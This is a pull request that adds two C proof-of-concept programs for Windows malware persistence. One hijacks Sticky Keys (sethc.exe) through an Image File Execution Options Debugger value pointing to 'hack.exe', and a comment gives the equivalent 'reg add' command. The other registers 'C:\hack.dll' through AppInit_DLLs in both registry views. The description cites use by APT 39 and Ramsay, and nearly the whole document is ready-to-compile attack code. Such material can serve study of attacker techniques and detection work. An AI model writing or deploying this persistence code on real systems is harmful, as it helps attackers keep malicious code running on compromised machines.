### PR TITLE
persistence: AppInit_DLLs

### DIFF
--- a/Techniques/Persistence/admin_persistence_accessibility_features.c
+++ b/Techniques/Persistence/admin_persistence_accessibility_features.c
@@ -1,0 +1,28 @@
+/*
+ * windows persistence via Accessibility Features
+ * Administrator level privileges are necessary to implement this trick. 
+ * author: @cocomelonc
+*/
+#include <windows.h>
+#include <string.h>
+
+int main(int argc, char* argv[]) {
+  HKEY hkey = NULL;
+
+  // image file
+  const char* img = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe";
+
+  // evil app
+  const char* exe = "C:\\Windows\\System32\\hack.exe";
+
+  // Debugger
+  LONG res = RegCreateKeyEx(HKEY_LOCAL_MACHINE, (LPCSTR)img, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_WRITE | KEY_QUERY_VALUE, NULL, &hkey, NULL);
+  if (res == ERROR_SUCCESS) {
+    // create new registry key
+    // reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /d "hack.exe"
+    RegSetValueEx(hkey, (LPCSTR)"Debugger", 0, REG_SZ, (unsigned char*)exe, strlen(exe));
+    RegCloseKey(hkey);
+  }
+
+  return 0;
+}

--- a/Techniques/Persistence/admin_persistence_appinit_dlls.c
+++ b/Techniques/Persistence/admin_persistence_appinit_dlls.c
@@ -1,0 +1,33 @@
+/*
+ * windows persistense via Appinit_DLLs
+ * Administrator level privileges are necessary to implement this trick. 
+ * author: @cocomelonc
+*/
+#include <windows.h>
+#include <string.h>
+
+int main(int argc, char* argv[]) {
+  HKEY hkey = NULL;
+  // malicious DLL
+  const char* dll = "C:\\hack.dll";
+  // activation
+  DWORD act = 1;
+
+  // 32-bit and 64-bit
+  LONG res = RegOpenKeyEx(HKEY_LOCAL_MACHINE, (LPCSTR)"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows", 0 , KEY_WRITE, &hkey);
+  if (res == ERROR_SUCCESS) {
+    // create new registry keys
+    RegSetValueEx(hkey, (LPCSTR)"LoadAppInit_DLLs", 0, REG_DWORD, (const BYTE*)&act, sizeof(act));
+    RegSetValueEx(hkey, (LPCSTR)"AppInit_DLLs", 0, REG_SZ, (unsigned char*)dll, strlen(dll));
+    RegCloseKey(hkey);
+  }
+
+  res = RegOpenKeyEx(HKEY_LOCAL_MACHINE, (LPCSTR)"SOFTWARE\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Windows", 0 , KEY_WRITE, &hkey);
+  if (res == ERROR_SUCCESS) {
+    // create new registry keys
+    RegSetValueEx(hkey, (LPCSTR)"LoadAppInit_DLLs", 0, REG_DWORD, (const BYTE*)&act, sizeof(act));
+    RegSetValueEx(hkey, (LPCSTR)"AppInit_DLLs", 0, REG_SZ, (unsigned char*)dll, strlen(dll));
+    RegCloseKey(hkey);
+  }
+  return 0;
+}


### PR DESCRIPTION
PoC: Administrator level privileges are necessary to implement this persistence trick.    

This technique is not new, but it is worth paying attention to it, in the wild, this trick was often used by groups such as [APT 39](https://attack.mitre.org/groups/G0087) and malwares as [Ramsay](https://attack.mitre.org/software/S0458/).     

TODO: refactoring (some variable names in the future)
